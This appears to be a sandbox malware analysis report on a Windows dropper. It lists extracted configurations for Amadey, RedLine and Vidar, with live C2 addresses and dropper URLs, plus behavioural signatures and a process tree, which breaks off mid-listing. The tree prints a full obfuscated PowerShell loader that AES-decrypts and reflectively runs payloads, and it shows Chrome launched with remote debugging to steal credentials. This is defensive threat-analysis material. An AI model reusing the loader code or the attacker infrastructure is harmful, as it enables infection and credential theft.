Resubmissions

21/02/2025, 13:19

250221-qkqm1sskh1 10

21/02/2025, 12:51

250221-p3vt1ssmek 10

20/02/2025, 14:07

250220-rey8mswqdj 10

Analysis

  • max time kernel
    323s
  • max time network
    326s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    21/02/2025, 12:51

General

  • Target

    0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe

  • Size

    2.1MB

  • MD5

    f22b0344fefdf201d07314323a83b022

  • SHA1

    6dde721e943cb298e50446083c1d7260071aaaae

  • SHA256

    0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483

  • SHA512

    61f92704af7395159edb879fe394a64e30b0b0818d642be1eeecafeee54e22570add0e4eac88c83e00cd9a4642e09a8529c77a69b4b7613bc3bcb9f78f50feac

  • SSDEEP

    49152:vDB/YpemdpJhhEwrtke2DSl/YKH7vOITWMPnzZPoc9j:9/kXhEikRDS/bvOIbPnzZxj

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 3 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 6 IoCs
  • Sectoprat family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 27 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 35 IoCs
  • Uses browser remote debugging 2 TTPs 28 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 54 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 50 IoCs
  • Identifies Wine through registry keys 2 TTPs 27 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 20 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 21 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
    "C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:5468
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4576
      • C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe
        "C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe
          "C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:1556
        • C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe
          "C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"
          4⤵
          • Executes dropped EXE
          PID:5736
        • C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe
          "C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1612
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 828
          4⤵
          • Program crash
          PID:1952
      • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
        "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:3940
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
            PID:3332
        • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
          "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1396
        • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
          "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:852
          • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
            "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2696
          • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
            "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1672
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 984
            4⤵
            • Program crash
            PID:1592
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3376
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4408
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2656
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              5⤵
              • Blocklisted process makes network request
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5572
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:568
        • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
          "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5372
        • C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe
          "C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2556
        • C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe
          "C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:5832
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:6124
        • C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe
          "C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4104
        • C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe
          "C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2104
        • C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe
          "C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:3912
        • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
          "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:1408
          • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
            "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:3804
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              5⤵
              • Uses browser remote debugging
              • Drops file in Windows directory
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:1616
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91615cc40,0x7ff91615cc4c,0x7ff91615cc58
                6⤵
                  PID:1832
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1932 /prefetch:2
                  6⤵
                    PID:1280
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1772,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1968 /prefetch:3
                    6⤵
                      PID:3116
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2196 /prefetch:8
                      6⤵
                        PID:1164
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3148 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:1604
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3196 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:3040
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4216,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4224 /prefetch:8
                        6⤵
                          PID:5008
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4440,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4384 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:5856
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4208,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4740 /prefetch:8
                          6⤵
                            PID:4348
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4904,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4884 /prefetch:8
                            6⤵
                              PID:1672
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5032 /prefetch:8
                              6⤵
                                PID:3792
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5200,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5224 /prefetch:1
                                6⤵
                                • Uses browser remote debugging
                                PID:5192
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5056,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4744 /prefetch:8
                                6⤵
                                  PID:1628
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                5⤵
                                • Uses browser remote debugging
                                • Drops file in Windows directory
                                • Enumerates system info in registry
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                PID:2332
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff926f0cc40,0x7ff926f0cc4c,0x7ff926f0cc58
                                  6⤵
                                    PID:5844
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1980,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1968 /prefetch:2
                                    6⤵
                                      PID:5808
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1716,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2140 /prefetch:3
                                      6⤵
                                        PID:3148
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2056,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2216 /prefetch:8
                                        6⤵
                                          PID:1884
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3152 /prefetch:1
                                          6⤵
                                          • Uses browser remote debugging
                                          PID:4816
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3196 /prefetch:1
                                          6⤵
                                          • Uses browser remote debugging
                                          PID:2640
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4496,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4388 /prefetch:8
                                          6⤵
                                            PID:5192
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4444,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4620 /prefetch:1
                                            6⤵
                                            • Uses browser remote debugging
                                            PID:3948
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4400,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4784 /prefetch:8
                                            6⤵
                                              PID:3504
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
